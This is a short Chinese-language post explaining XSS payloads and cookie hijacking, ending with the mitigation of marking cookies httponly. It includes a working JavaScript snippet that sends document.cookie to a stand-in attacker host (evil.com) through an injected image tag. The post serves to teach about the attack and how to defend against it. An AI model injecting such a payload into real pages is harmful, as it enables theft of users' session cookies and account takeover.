XSS Payload其实就是一段Javascript脚本(还可以是Flash或其他富客户端的脚本),所以任何JavaScript脚本能实现的功能,XSS Payload都能做到。一个最常见的XSS Payload,就是通过读取浏览器的Cookie对象,从而发起“Cookie 劫持”攻击
Example
var img = document.createElement(“img”);img.src = “http://www.evil.com/log?”+escape(document.cookie);
document.body.appendChild(img);
可以通过XSS将这段代码注入到目标页面中,并在最后将document.cookie对象作为参数发送到远程服务器
set-cookie时要httponly
欢迎来到这里!
我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。
注册 关于